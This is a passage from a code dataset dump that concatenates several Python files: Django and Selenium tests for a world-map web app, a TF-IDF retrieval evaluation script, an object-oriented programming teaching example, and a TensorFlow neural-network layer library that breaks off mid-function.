self.assertTrue(isinstance(test, WorldBorder))\n self.assertEqual(test.__str__(), test.name)\n\n # Tests index view works - as data passed is WorldBorder\n def test_index_view(self):\n test = self.create_border()\n response = self.client.get(reverse('index'))\n self.assertEqual(response.status_code, 200)\n\n# Tests on UserMap model\nclass UserMapsTests(TestCase):\n\n # Function to create map entry\n def create_map(self, 
mapname=\"testMap\"):\n return UserMap.objects.create(mapname=mapname)\n\n # Tests map creation\n def test_map_creation(self):\n test= self.create_map()\n self.assertTrue(isinstance(test, UserMap))\n self.assertEqual(test.__str__(), test.mapname)\n\n # Tests view that shows maps\n def test_show_maps_view(self):\n test = self.create_map()\n response = self.client.get(reverse('show_maps'))\n self.assertEqual(response.status_code, 200)\n\n # Tests form to create map\n def test_add_map_form(self):\n test = UserMap.objects.create(mapname=\"maptest\")\n data={'mapname' : test.mapname}\n testform = UserMapForm(data=data)\n self.assertTrue(testform.is_valid())\n\n testform = UserMapForm()\n self.assertEqual(testform.is_valid(), False)\n\n# Tests on CountryList Model\nclass CountryListTests(TestCase):\n\n # Function to create CountryList entry\n def create_countrylist(self, layername=\"testlayer\", year=1, layercolour=\"Blue\"):\n return CountryList.objects.create(layername=layername,year=year,layercolour=layercolour)\n\n # Tests CountryList creation\n def test_countrylist_creation(self):\n test = self.create_countrylist()\n self.assertTrue(isinstance(test, CountryList))\n self.assertEqual(test.__str__(), test.layername)\n\n # Tests form to create CountryList\n def test_add_layer_form(self):\n test = CountryList.objects.create(layername=\"testlayer\", year=1)\n data= {'name' : test.layername,'listofcountries' : 'France', 'year' : test.year, 'layercolour' : 'Green'}\n testform = CountryForm(data=data)\n self.assertTrue(testform.is_valid())\n\n testform = CountryForm()\n self.assertEqual(testform.is_valid(), False)\n\n # Tests view that shows layers\n def test_show_layers_view(self):\n test = self.create_countrylist()\n response = self.client.get(reverse('show_layers'))\n self.assertEqual(response.status_code, 200)\n\n# Tests on webpages\n# Selenium test setUp and tearDown from https://realpython.com/blog/python/testing-in-django-part-1-best-practices-and-examples/\nclass NavTestCase(LiveServerTestCase):\n\n # Instantiates selenium firefox driver\n def setUp(self):\n self.selenium = webdriver.Firefox()\n super(NavTestCase, self).setUp()\n\n def tearDown(self):\n self.selenium.quit()\n super(NavTestCase, self).tearDown()\n\n # checks first select is populated with map names\n def test_select_populate(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/')\n time.sleep(20)\n select = Select(selenium.find_element_by_id('map'))\n select.select_by_value(\"testMap\")\n\n # checks second select is populated after first is selected\n def test_second_select(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/')\n time.sleep(2)\n select = Select(selenium.find_element_by_id('map'))\n select.select_by_value(\"testMap\")\n time.sleep(2)\n select = Select(selenium.find_element_by_id('layer'))\n\n # checks navigation to see layers\n def test_layer_nav(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/show_layers/')\n link = selenium.find_element_by_link_text('Edit')\n link.click()\n time.sleep(1)\n selenium.find_element_by_id('id_countrylist')\n\n # checks navigation to see maps\n def test_map_nav(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/show_maps/')\n link = selenium.find_element_by_link_text('Edit')\n link.click()\n time.sleep(1)\n selenium.find_element_by_id('id_mapname')\n\n # checks index navigation\n def test_index_nav(self):\n selenium = self.selenium\n 
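# Open the index page, follow the 'Add Map' link, and confirm the map-name field is present;\n # find_element_by_id raises NoSuchElementException and fails the test if navigation broke.\n 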
selenium.get('http://localhost:8080/world/')\n link = selenium.find_element_by_link_text('Add Map')\n link.click()\n time.sleep(1)\n\n selenium.find_element_by_id('id_mapname')\n\n # Checks that, when a feature is added to the map, the exportjson button works\n # Proving features can be added as well as the button functionality\n # Works as about:blank will not open unless there are features on the map\n def test_adding_geojson(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/')\n time.sleep(2)\n selenium.find_element_by_name('addFeatureValue').send_keys(\"France\")\n submit = selenium.find_element_by_id('addindividualfeatures')\n time.sleep(1)\n submit.click()\n time.sleep(3)\n json = selenium.find_element_by_id('exportjson')\n json.click()\n time.sleep(1)\n selenium.get('about:blank')\n\n # As per the last function, checks removal of features from the map\n # works as the alert only pops up if there are no map layers\n def test_removing(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/')\n time.sleep(2)\n selenium.find_element_by_name('addFeatureValue').send_keys(\"France\")\n submit = selenium.find_element_by_id('addindividualfeatures')\n time.sleep(1)\n submit.click()\n time.sleep(3)\n clear = selenium.find_element_by_id('clearform')\n clear.click()\n time.sleep(1)\n json = selenium.find_element_by_id('exportjson')\n time.sleep(1)\n json.click()\n time.sleep(1)\n alert=selenium.switch_to_alert()\n alert.accept()\n\n\n# Tests on Admin site\nclass AdminTestCase(LiveServerTestCase):\n\n def setUp(self):\n User.objects.create_superuser(\n username='admin',\n password='testpassword',\n email='admin@example.com'\n )\n\n self.selenium = webdriver.Firefox()\n super(AdminTestCase, self).setUp()\n\n def tearDown(self):\n self.selenium.quit()\n super(AdminTestCase, self).tearDown()\n\n # Checks new users can be added in admin site, also checking admin log on\n def test_register(self):\n selenium = self.selenium\n #Opening the link we want to test\n selenium.get('http://localhost:8080/world/admin/')\n username = selenium.find_element_by_id('id_username')\n password = selenium.find_element_by_id('id_password')\n username.send_keys(\"admin\")\n password.send_keys(\"testpassword\")\n # password.send_keys(Keys.RETURN)\n selenium.find_element_by_xpath('//*[@id=\"login-form\"]/div[3]/input').click()\n password.submit()\n time.sleep(1)\n selenium.get('http://localhost:8080/world/admin/auth/user/add/')\n\n selenium.find_element_by_id('id_username').send_keys(\"test\")\n selenium.find_element_by_name('password1').send_keys(\"test\")\n selenium.find_element_by_name('password2').send_keys(\"test\")\n\n selenium.find_element_by_id(\"user_form\").submit()\n","sub_path":"world/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"643131256","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.metrics import average_precision_score\nimport numpy as np\nimport nltk\nfrom nltk.stem import PorterStemmer\nimport nimfa\nfrom sklearn import preprocessing\nfrom scipy import sparse\n\nenglish_stemmer = PorterStemmer()\nclass StemmedTfidfVectorizer(TfidfVectorizer):\n def build_analyzer(self):\n analyzer = super(TfidfVectorizer, self).build_analyzer()\n return lambda doc: (english_stemmer.stem(w) for w in analyzer(doc))\np10=0.0\np20=0.0\ncorpus = 
[]\nmapscore=0.0\n# prepare corpus and relevance\nf = open(\"./q/\"+str(1)+\".txt\")\n# reserve slot 0 of the corpus for the query text; it is overwritten for each query in the loop below\ncorpus.append(f.read())\nfor d in range(0,1400):\n f = open(\"./d/\"+str(d+1)+\".txt\")\n corpus.append((f.read()))\n\nfor q in range(1, 226):\n \n relevance = \"\"\n \n # add query to corpus\n f = open(\"./q/\"+str(q)+\".txt\")\n corpus[0]=(f.read())\n # relevance\n f = open(\"./r/\"+str(q)+\".txt\")\n relevance = np.array(list(map(int, filter(None, f.read().split(\"\\n\")))))\n\n #creating tfidf_matrix\n tfidf_vectorizer = StemmedTfidfVectorizer(min_df=1, stop_words='english', analyzer='word', ngram_range=(1,1))\n tfidf_matrix = tfidf_vectorizer.fit_transform(corpus)\n \n #binary array of relevant documents\n truearr=[0]*1400\n sizenow=len(relevance)\n for temper in range(0,sizenow):\n truearr[relevance[temper]-1]=1\n\n # Cosine similarity measure\n csim = np.array(cosine_similarity(tfidf_matrix[0], tfidf_matrix[1:len(corpus)])[0])\n #calculating p@10 and p@20\n count=0.0\n count1=0.0\n top10=csim.argsort()[-10:][::-1]+1\n top20=csim.argsort()[-20:][::-1]+1\n for x in range(0,10):\n for y in range(0,relevance.size):\n if top10[x]==relevance[y]:\n count=count+1\n for x in range(0,20):\n for y in range(0,relevance.size):\n if top20[x]==relevance[y]:\n count1=count1+1\n\n count=count/10.0\n count1=count1/20.0\n p10=p10+count\n p20=p20+count1\n\n #average precision\n cscore = average_precision_score(truearr, csim, average='micro')\n mapscore=mapscore+cscore\n\n\n#average p@10 for all the queries\np10=p10/q\n\n#average p@20 for all the queries\np20=p20/q\n\n#mean average score\nmapscore=mapscore/q\n\n#print (\"MAP = \" + str(mapscore) + \" p@10 = \" + str(p10) + \" p@20 = \" + str(p20) + \"\\n\")","sub_path":"Intermediate results/noprf.py","file_name":"noprf.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"66903656","text":"##########################################################################################################################################\n# Basically to understand the Class, Inheritance\n# \n# @lessons learned: \n# Python does NOT support method overloading... 
aka CompileTime Polymorphism...\n# https://www.geeksforgeeks.org/python-method-overloading/\n#\n# @date Sun, 12Jan2020 @ 01:15 AM IST\n# @version 1.0\n# @author VMP Consulting\n#\n##########################################################################################################################################\nclass Shapes():\n myGreetings = \"Hi, Welcome To Coindsyz!!!\"\n def describeSelf(self):\n print(\"\\nHi, This is the class Shapes, and I would be the PARENT class for my subclasses, \" +\n \"viz., Triangle, ReversedTriangle, Square, Rectangle, Forward and Backward slashes...\")\n \n\n #Note: A Private method in python gets defined by preceding doubleunderscore to the method name...for instance, __myMethod(self)\n def __describeSelfPrivate(self, pGreetings):\n print (\"\\n\\nHi, I'm an overloaded method (note: OVERLOADING (of methods) always happens WITHIN THE SAME CLASS) and \" +\n \"the greeting message I've received is : \" + pGreetings + \" and I happen to have a PRIVATE access, which means\" +\n \"I'm not accessible beyond this boundaries of this class, either by it's child classes or other classes outside of this one...\")\n \n def callAllMethodsOfTheClass(self):\n describeSelf()\n __describeSelfPrivate(myGreetings)\n\n# The overloaded version of the method describeSelf() are commented out, since, we understood now that, Python does not support method overloading...\n# def describeSelf(self, pGreetings, pName):\n# print (\"\\nHi, I'm one more version of overloaded method but, the difference here is, my access is PROTECTED, which means, I'm available to \" +\n# \"all of the child classes, which are getting inherited from me, the parent class, called Shapes...\\n\" +\n# \"do note that, just because I'm having one more extra parameter from my sibling method, this overloading becomes possible...\" +\n# \"Otherwise, If I happen to have a same set of parameters as my sibiling method, you would get an compilation error...\" +\n# \"so, do note that, only when the signature of the method happen to be different, the OVERLOADING becomes a possibility...\" +\n# \"methods, with same signature, can never be called/make overloading possible...\")\n \nclass Triangle(Shapes):\n def describeSelf(self):\n print(\"\\nHi, This is the Triangle class, which is the CHILD class of my PARENT class called SHAPES...\" +\n \"and by RETAINING THE SAME METHOD SIGNATURE as that of my PARENT class, I would be OVERRIDING the implementation of this \" +\n \"method, which has my own (child) version of the implementation, which is different from the implementation of my PARENT class... \")\n \nclass Square (Shapes):\n def printYourShape():\n print (\"\\nHi, I'm A Square!!!\")\n \n\nmyGreetings = \"Hi, Welcome To Coindsyz!!!\"\nmyName = \"M. 
Nachimuthu\"\nprint (\"OOPS Training Version Three\");\nmyShapes = Shapes()\nmyShapes.describeSelf()\nmyShapes.callAllMethodsOfTheClass()\n\nmyTriangle = Triangle();\nmyTriangle.describeSelf()\n\nmySquare = Square();\nmySquare.describeSelf();\n#input();\n\n","sub_path":"sourceCode/python/OOPSTrainingVersionThree.py","file_name":"OOPSTrainingVersionThree.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19170156","text":"import tensorflow as tf\nimport numpy as np\nimport sys, os,cv2\nfrom sklearn.utils import shuffle\nfrom scipy.misc import imread,imresize\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import OneHotEncoder\nfrom skimage.transform import resize\nfrom imgaug import augmenters as iaa\nimport nibabel as nib\nimport imgaug as ia\nfrom scipy.ndimage import zoom\n\nplt.style.use('seaborn-white')\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nnp.random.seed(6278)\ntf.set_random_seed(6728)\nia.seed(6278)\n\n# ======= Activation Function ==========\ndef tf_elu(x): return tf.nn.elu(x)\ndef d_tf_elu(x): return tf.cast(tf.greater(x,0),tf.float32) + (tf_elu(tf.cast(tf.less_equal(x,0),tf.float32) * x) + 1.0)\n\ndef tf_tanh(x): return tf.nn.tanh(x)\ndef d_tf_tanh(x): return 1 - tf_tanh(x) ** 2\n\ndef tf_sigmoid(x): return tf.nn.sigmoid(x) \ndef d_tf_sigmoid(x): return tf_sigmoid(x) * (1.0-tf_sigmoid(x))\n\ndef tf_atan(x): return tf.atan(x)\ndef d_tf_atan(x): return 1.0/(1.0 + x**2)\n\ndef tf_iden(x): return x\ndef d_tf_iden(x): return 1.0\n\ndef tf_softmax(x): return tf.nn.softmax(x)\ndef softabs(x): return tf.sqrt(x ** 2 + 1e-20)\n# ======= Activation Function ==========\n\n# ====== miscellaneous =====\n# code from: https://github.com/tensorflow/tensorflow/issues/8246\ndef tf_repeat(tensor, repeats):\n \"\"\"\n Args:\n\n input: A Tensor. 1-D or higher.\n repeats: A list. Number of repeat for each dimension, length must be the same as the number of dimensions in input\n\n Returns:\n \n A Tensor. Has the same type as input. 
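Example (illustrative, following the expand/tile/reshape logic below):\n tf_repeat(tf.constant([1, 2]), [2]) gives [1, 1, 2, 2]\n tf_repeat(tf.ones([2, 3]), [2, 1]) has shape [4, 3], with each row repeated twice in place\n 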
Has the shape of tensor.shape * repeats\n \"\"\"\n expanded_tensor = tf.expand_dims(tensor, -1)\n multiples = [1] + repeats\n tiled_tensor = tf.tile(expanded_tensor, multiples = multiples)\n repeated_tesnor = tf.reshape(tiled_tensor, tf.shape(tensor) * repeats)\n return repeated_tesnor\ndef unpickle(file):\n import pickle\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n# ====== miscellaneous =====\n\n# ================= LAYER CLASSES =================\nclass CNN():\n \n def __init__(self,k,inc,out,act=tf_elu,d_act=d_tf_elu):\n self.w = tf.Variable(tf.random_normal([k,k,inc,out],stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def getw(self): return [self.w]\n\n def feedforward(self,input,stride=1,padding='SAME'):\n self.input = input\n self.layer = tf.nn.conv2d(input,self.w,strides=[1,stride,stride,1],padding=padding) \n self.layerA = self.act(self.layer)\n return self.layerA \n\n def backprop(self,gradient,stride=1,padding='SAME'):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n\n grad = tf.nn.conv2d_backprop_filter(input = grad_part_3,filter_sizes = self.w.shape,out_backprop = grad_middle,\n strides=[1,stride,stride,1],padding=padding\n )\n\n grad_pass = tf.nn.conv2d_backprop_input(input_sizes = [batch_size] + list(grad_part_3.shape[1:]),filter= self.w,out_backprop = grad_middle,\n strides=[1,stride,stride,1],padding=padding\n )\n\n update_w = []\n update_w.append(tf.assign( self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass CNN_3D():\n \n def __init__(self,filter_depth,filter_height,filter_width,in_channels,out_channels,act=tf_elu,d_act=d_tf_elu):\n self.w = tf.Variable(tf.random_normal([filter_depth,filter_height,filter_width,in_channels,out_channels],stddev=0.05,seed=2,dtype=tf.float64))\n self.b = tf.Variable(tf.random_normal([out_channels],stddev=0.05,seed=2,dtype=tf.float64))\n self.act,self.d_act = act,d_act\n def getw(self): return [self.w]\n\n def feedforward(self,input,stride=1,padding='SAME',res=True):\n self.input = input\n self.layer = tf.nn.conv3d(input,self.w,strides=[1,1,1,1,1],padding=padding) + self.b\n self.layerA = self.act(self.layer)\n if res:\n return self.layerA + self.input\n else:\n return self.layerA \n\n def backprop(self):\n raise NotImplementedError(\"Not Implemented Yet\")\n\nclass CNN_Trans():\n \n def __init__(self,k,inc,out,act=tf_elu,d_act=d_tf_elu):\n self.w = tf.Variable(tf.random_normal([k,k,inc,out],stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def getw(self): return [self.w]\n\n def feedforward(self,input,stride=1,padding='SAME'):\n self.input = input\n output_shape2 = self.input.shape[2].value * stride\n self.layer = tf.nn.conv2d_transpose(\n input,self.w,output_shape=[batch_size,output_shape2,output_shape2,self.w.shape[2].value],\n strides=[1,stride,stride,1],padding=padding) \n self.layerA = self.act(self.layer)\n return self.layerA \n\n def 
backprop(self,gradient,stride=1,padding='SAME'):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n\n grad = tf.nn.conv2d_backprop_filter(input = grad_middle,\n filter_sizes = self.w.shape,out_backprop = grad_part_3,\n strides=[1,stride,stride,1],padding=padding\n )\n\n grad_pass = tf.nn.conv2d(\n input=grad_middle,filter = self.w,strides=[1,stride,stride,1],padding=padding\n )\n \n update_w = []\n update_w.append(tf.assign( self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass RNN_CNN():\n\n def __init__(self,timestamp,c_in,c_out,x_kernel,h_kernel,size,act=tf_elu,d_act=d_tf_elu):\n\n self.w = tf.Variable(tf.random_normal([x_kernel,x_kernel,c_in,c_out],stddev=0.05,seed=2,dtype=tf.float64))\n self.h = tf.Variable(tf.random_normal([h_kernel,h_kernel,c_out,c_out],stddev=0.05,seed=2,dtype=tf.float64))\n\n self.act = act; self.d_act = d_act\n\n self.input_record = tf.Variable(tf.zeros([timestamp,batch_size,size,size,c_in],tf.float64))\n self.hidden_record = tf.Variable(tf.zeros([timestamp+1,batch_size,size,size,c_out],tf.float64))\n self.hiddenA_record = tf.Variable(tf.zeros([timestamp+1,batch_size,size,size,c_out],tf.float64))\n \n self.m_x,self.v_x = tf.Variable(tf.zeros_like(self.w,dtype=tf.float64)),tf.Variable(tf.zeros_like(self.w,dtype=tf.float64))\n self.m_h,self.v_h = tf.Variable(tf.zeros_like(self.h,dtype=tf.float64)),tf.Variable(tf.zeros_like(self.h,dtype=tf.float64))\n\n def feedfoward(self,input,timestamp):\n\n # assign the input for back prop\n hidden_assign = []\n hidden_assign.append(tf.assign(self.input_record[timestamp,:,:,:],input))\n\n # perform feed forward\n layer = tf.nn.conv2d(input,self.w,strides=[1,1,1,1],padding='SAME') + tf.nn.conv2d(self.hidden_record[timestamp,:,:,:,:],self.h,strides=[1,1,1,1],padding='SAME') \n layerA = self.act(layer)\n\n # assign for back prop\n hidden_assign.append(tf.assign(self.hidden_record[timestamp+1,:,:,:,:],layer))\n hidden_assign.append(tf.assign(self.hiddenA_record[timestamp+1,:,:,:,:],layerA))\n\n return layerA, hidden_assign \n\n def backprop(self,grad,timestamp):\n\n grad_1 = grad\n grad_2 = self.d_act(self.hidden_record[timestamp,:,:,:,:])\n grad_3_x = self.input_record[timestamp,:,:,:,:]\n grad_3_h = self.hiddenA_record[timestamp-1,:,:,:,:]\n\n grad_middle = grad_1 * grad_2\n\n grad_x = tf.nn.conv2d_backprop_filter(\n input=grad_3_x,filter_size = self.w.shape,\n out_backprop = grad_middle,strides=[1,1,1,1],padding='SAME'\n )\n\n grad_h = tf.nn.conv2d_backprop_filter(\n input=grad_3_h,filter_size = self.h.shape,\n out_backprop = grad_middle,strides=[1,1,1,1],padding='SAME'\n )\n\n grad_pass = tf.nn.conv2d_backprop_input(\n input_size = self.hiddenA_record[timestamp-1,:,:,:].shape,\n filter=self.h,out_backprop = grad_middle,\n strides=[1,1,1,1],padding='SAME'\n )\n\n update_w = []\n # === update x ====\n update_w.append( tf.assign(self.m_x,beta_1*self.m_x + (1-beta_1) * grad_x) )\n update_w.append( tf.assign(self.v_x,beta_2*self.v_x + (1-beta_2) * grad_x ** 2) )\n m_hat_x = self.m_x/(1-beta_1)\n v_hat_x = self.v_x/(1-beta_2)\n adam_middle_x = learning_rate/(tf.sqrt(v_hat_x) + adam_e)\n update_w.append( tf.assign(self.w_x, 
tf.subtract(self.w_x,adam_middle_x*m_hat_x)) )\n\n # === update h ====\n update_w.append( tf.assign(self.m_h,beta_1*self.m_h + (1-beta_1) * grad_h) )\n update_w.append( tf.assign(self.v_h,beta_2*self.v_h + (1-beta_2) * grad_h ** 2) )\n m_hat_h = self.m_h/(1-beta_1)\n v_hat_h = self.v_h/(1-beta_2)\n adam_middle_h = learning_rate/(tf.sqrt(v_hat_h) + adam_e)\n update_w.append( tf.assign(self.w_h, tf.subtract(self.w_h,adam_middle_h*m_hat_h)) )\n \n return grad_pass,update_w\n \nclass ZigZag_RNN_CNN():\n\n def __init__(self,timestamp,c_in,c_out,x_kernel,h_kernel,size,act=tf_elu,d_act=d_tf_elu):\n \n self.w_1 = tf.Variable(tf.random_normal([x_kernel,x_kernel,c_in,c_out],stddev=0.05,seed=2))\n self.h_1 = tf.Variable(tf.random_normal([h_kernel,h_kernel,c_out,c_out],stddev=0.05,seed=2))\n\n self.act = act; self.d_act = d_act\n\n self.w_2 = tf.Variable(tf.random_normal([x_kernel,x_kernel,c_in,c_out],stddev=0.05,seed=2))\n self.h_2 = tf.Variable(tf.random_normal([h_kernel,h_kernel,c_out,c_out],stddev=0.05,seed=2))\n\n self.input_record_1 = tf.Variable(tf.zeros([timestamp,batch_size//2,size,size,c_in]))\n self.hidden_record_1 = tf.Variable(tf.zeros([timestamp+1,batch_size//2,size,size,c_out]))\n self.hiddenA_record_1 = tf.Variable(tf.zeros([timestamp+1,batch_size//2,size,size,c_out]))\n \n self.input_record_2 = tf.Variable(tf.zeros([timestamp,batch_size//2,size,size,c_in]))\n self.hidden_record_2 = tf.Variable(tf.zeros([timestamp+1,batch_size//2,size,size,c_out]))\n self.hiddenA_record_2 = tf.Variable(tf.zeros([timestamp+1,batch_size//2,size,size,c_out]))\n\n def feedforward_straight(self,input1,input2,timestamp):\n\n # assign the inputs \n hidden_assign = []\n \n # perform feed forward on left\n layer_1 = tf.nn.conv2d(input1,self.w_1,strides=[1,1,1,1],padding='SAME') + \\\n tf.nn.conv2d(self.hiddenA_record_1[timestamp,:,:,:,:],self.h_1,strides=[1,1,1,1],padding='SAME') \n layerA_1 = self.act(layer_1)\n\n # perform feed forward on right\n layer_2 = tf.nn.conv2d(input2,self.w_2,strides=[1,1,1,1],padding='SAME') + \\\n tf.nn.conv2d(self.hiddenA_record_2[timestamp,:,:,:,:],self.h_2,strides=[1,1,1,1],padding='SAME') \n layerA_2 = self.act(layer_2)\n \n # assign for left\n hidden_assign.append(tf.assign(self.hidden_record_1[timestamp+1,:,:,:,:],layer_1))\n hidden_assign.append(tf.assign(self.hiddenA_record_1[timestamp+1,:,:,:,:],layerA_1))\n\n # assign for right\n hidden_assign.append(tf.assign(self.hidden_record_2[timestamp+1,:,:,:,:],layer_2))\n hidden_assign.append(tf.assign(self.hiddenA_record_2[timestamp+1,:,:,:,:],layerA_2))\n\n return layerA_1,layerA_2,hidden_assign\n\n def feedforward_zigzag(self,input1,input2,timestamp):\n \n # assign the inputs \n hidden_assign = []\n \n # perform feed forward on left\n layer_1 = tf.nn.conv2d(input1,self.w_1,strides=[1,1,1,1],padding='SAME') + \\\n tf.nn.conv2d(self.hiddenA_record_2[timestamp,:,:,:,:],self.h_1,strides=[1,1,1,1],padding='SAME') \n layerA_1 = self.d_act(layer_1)\n\n # perform feed forward on right\n layer_2 = tf.nn.conv2d(input2,self.w_2,strides=[1,1,1,1],padding='SAME') + \\\n tf.nn.conv2d(self.hiddenA_record_1[timestamp,:,:,:,:],self.h_2,strides=[1,1,1,1],padding='SAME') \n layerA_2 = self.d_act(layer_2)\n \n # assign for left\n hidden_assign.append(tf.assign(self.hidden_record_1[timestamp+1,:,:,:,:],layer_1))\n hidden_assign.append(tf.assign(self.hiddenA_record_1[timestamp+1,:,:,:,:],layerA_1))\n\n # assign for right\n hidden_assign.append(tf.assign(self.hidden_record_2[timestamp+1,:,:,:,:],layer_2))\n 
hidden_assign.append(tf.assign(self.hiddenA_record_2[timestamp+1,:,:,:,:],layerA_2))\n\n return layerA_1,layerA_2,hidden_assign\n\nclass LSTM_CNN():\n \n def __init__(self):\n raise NotImplementedError(\"Not Implemented Yet\")\n\nclass FNN():\n \n def __init__(self,input_dim,hidden_dim,act,d_act):\n self.w = tf.Variable(tf.random_normal([input_dim,hidden_dim], stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.v_hat_prev = tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def getw(self): return [self.w]\n\n def feedforward(self,input=None):\n self.input = input\n self.layer = tf.matmul(input,self.w)\n self.layerA = self.act(self.layer)\n return self.layerA\n\n def backprop(self,gradient=None):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n grad = tf.matmul(tf.transpose(grad_part_3),grad_middle)\n grad_pass = tf.matmul(tf.multiply(grad_part_1,grad_part_2),tf.transpose(self.w))\n\n update_w = []\n update_w.append(tf.assign( self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass RNN():\n \n def __init__(self):\n raise NotImplementedError(\"Not Implemented Yet\")\n\nclass LSTM():\n \n def __init__(self):\n raise NotImplementedError(\"Not Implemented Yet\")\n\nclass ICA_Layer():\n\n def __init__(self,inc):\n self.w_ica = tf.Variable(tf.random_normal([inc,inc],stddev=0.05,seed=2)) \n\n def feedforward(self,input):\n self.input = input\n self.ica_est = tf.matmul(input,self.w_ica)\n self.ica_est_act = tf_atan(self.ica_est)\n return self.ica_est_act\n\n def backprop(self):\n grad_part_2 = d_tf_atan(self.ica_est)\n grad_part_3 = self.input\n\n grad_pass = tf.matmul(grad_part_2,tf.transpose(self.w_ica))\n g_tf = tf.linalg.inv(tf.transpose(self.w_ica)) - (2/batch_size) * tf.matmul(tf.transpose(self.input),self.ica_est_act)\n\n update_w = []\n update_w.append(tf.assign(self.w_ica,self.w_ica+0.2*g_tf))\n\n return grad_pass,update_w \n\nclass Sparse_Filter_Layer():\n \n def __init__(self,outc,changec):\n self.w = tf.Variable(tf.random_normal([outc,changec],stddev=1.0,seed=2,dtype=tf.float64))\n self.epsilon = 1e-20\n\n def getw(self): return self.w\n\n def soft_abs(self,value):\n return tf.sqrt(value ** 2 + self.epsilon)\n\n def feedforward(self,input):\n self.sparse_layer = tf.matmul(input,self.w)\n second = self.soft_abs(self.sparse_layer )\n third = tf.divide(second,tf.sqrt(tf.reduce_sum(second**2,axis=0)+self.epsilon))\n four = tf.divide(third,tf.sqrt(tf.reduce_sum(third**2,axis=1)[:,tf.newaxis] +self.epsilon))\n self.cost_update = tf.reduce_mean(four)\n return self.sparse_layer ,self.cost_update\n\nclass SOM_Layer(): \n\n def __init__(self,m,n,dim,num_epoch,learning_rate_som = 0.04,radius_factor = 1.1, gaussian_std=0.5):\n \n self.m = m\n self.n = n\n self.dim = dim\n self.gaussian_std = gaussian_std\n self.num_epoch = num_epoch\n # self.map = tf.Variable(tf.random_uniform(shape=[m*n,dim],minval=0,maxval=1,seed=2))\n self.map = tf.Variable(tf.random_normal(shape=[m*n,dim],seed=2))\n\n self.location_vects = tf.constant(np.array(list(self._neuron_locations(m, n))))\n self.alpha = 
learning_rate_som\n self.sigma = max(m,n)*1.1\n\n def _neuron_locations(self, m, n):\n \"\"\"\n Yields one by one the 2-D locations of the individual neurons in the SOM.\n \"\"\"\n # Nested iterations over both dimensions to generate all 2-D locations in the map\n for i in range(m):\n for j in range(n):\n yield np.array([i, j])\n\n def getmap(self): return self.map\n def getlocation(self): return self.bmu_locs\n\n def feedforward(self,input):\n \n self.input = input\n self.grad_pass = tf.pow(tf.subtract(tf.expand_dims(self.map, axis=0),tf.expand_dims(self.input, axis=1)), 2)\n self.squared_distance = tf.reduce_sum(self.grad_pass, 2)\n self.bmu_indices = tf.argmin(self.squared_distance, axis=1)\n self.bmu_locs = tf.reshape(tf.gather(self.location_vects, self.bmu_indices), [-1, 2])\n\n def backprop(self,iter,num_epoch):\n\n # Update the weigths \n radius = tf.subtract(self.sigma,\n tf.multiply(iter,\n tf.divide(tf.cast(tf.subtract(self.alpha, 1),tf.float32),\n tf.cast(tf.subtract(num_epoch, 1),tf.float32))))\n\n alpha = tf.subtract(self.alpha,\n tf.multiply(iter,\n tf.divide(tf.cast(tf.subtract(self.alpha, 1),tf.float32),\n tf.cast(tf.subtract(num_epoch, 1),tf.float32))))\n\n self.bmu_distance_squares = tf.reduce_sum(\n tf.pow(tf.subtract(\n 